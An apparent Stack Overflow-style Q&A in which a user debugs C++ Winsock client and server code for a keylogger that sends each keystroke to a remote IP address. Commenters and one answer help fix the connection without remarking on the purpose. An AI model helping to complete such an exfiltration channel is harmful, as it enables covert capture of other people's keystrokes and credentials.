# Socket Listening / Connecting

Tags: c++, sockets

I'm making a keylogger that sends each keystroke to the remote server. So far, it only works when I set localhost as the address. Otherwise, the client server connection is simply not working.... I have made sure the port is open on my router. What do I need to make this work?

Server (all the sending and receiving works when the client and server use localhost, it is handled elsewhere obv):

```
SOCKET retConnect() {
        SOCKADDR_IN addr;
        int addrlen = sizeof(addr); 
        addr.sin_addr.s_addr = htonl(INADDR_ANY);
        addr.sin_port = htons(9901); 
        addr.sin_family = AF_INET; 
        SOCKET sListen = socket(AF_INET, SOCK_STREAM, NULL); 
        bind(sListen, (SOCKADDR*)&addr, sizeof(addr));
        listen(sListen, SOMAXCONN);

        SOCKET newConnection; 
        newConnection = accept(sListen, (SOCKADDR*)&addr, &addrlen); 
        return newConnection;

    }
```

Client (all the sending and receiving works when the client and server use localhost, it is handled elsewhere obv):

```
SOCKET retconnect() {
        SOCKADDR_IN addr; 
        int sizeofaddr = sizeof(addr); 
        addr.sin_addr.s_addr = inet_addr("72.208.184.42"); 
        addr.sin_port = htons(9901); 
        addr.sin_family = AF_INET;

        SOCKET Connection = socket(AF_INET, SOCK_STREAM, NULL);
        if (connect(Connection, (SOCKADDR*)&addr, sizeofaddr) != 0) 
        {
            MessageBoxA(NULL, "Failed to Connect, are you connected to the same port as the server?", "Error", MB_OK | MB_ICONERROR);
            return 0; //Failed to Connect
        }
        else return Connection;

    }
```

edit: the client is not connecting to the remote server.

I'm not entirely familiar with a lot of networking terms, so please explain simply.

Comment: Not working how? There are many states of not working. Please expand. What fails and where?

Comment: The server code isn't doing any error checking -- socket(), or bind(), or listen() might have failed and you'd never know which one because you don't check the return values on those calls.

Comment: And when you do get an error, drop yourself a few breadcrumbs by [giving yourself an error message](https://msdn.microsoft.com/en-us/library/windows/desktop/ms680582(v=vs.85).aspx).

Comment: found the error. the client code does not connect to the remote server. I also updated the server address to htonl(INADDR_ANY). not sure how to fix this still...

Comment: Unless and until you start posting actual error messages here, your question is unanswerable and is liable to be deleted.

Comment: it literally just stops at if (connect(Connection, (SOCKADDR*)&addr, sizeofaddr) != 0)

Comment: That will time out after about a minute.

Comment: You should probably initialize the memory for `addr`, setting it to `0`... I stopped reading at that point (it was the first line)... but I'm sure there's more to consider.

Answer (score 0):

Since your server only binds localhost(127.0.0.1).

Change the IP address for listen '127.0.0.1' to '0.0.0.0' or '72.208.184.42' as your client code does.